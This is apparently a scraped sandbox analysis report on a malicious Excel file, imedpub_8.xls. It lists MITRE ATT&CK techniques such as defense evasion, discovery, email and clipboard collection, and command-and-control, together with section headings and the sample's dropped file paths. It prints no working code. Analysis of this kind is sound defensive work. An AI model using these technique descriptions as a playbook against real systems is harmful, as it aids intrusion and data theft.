Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report imedpub_8.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Sigma Overview

System Summary

Jbx Signature Overview

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\JooSee.dll

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

C:\Users\user\AppData\Local\Temp\32B4.tmp

C:\Users\user\AppData\Local\Temp\~DF3B12D0E9CF2F0062.TMP

C:\Users\user\AppData\Local\Temp\~DF9DFA6BFBFA953BEE.TMP

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X5Z6VJ3ODJ5VBJVEIRD5.temp

C:\Users\user\Desktop\imedpub_8.xls

Static File Info

General

File Icon

Static OLE Info

General

OLE File "imedpub_8.xls"

Indicators

Summary

Windows Analysis Report
imedpub_8.xls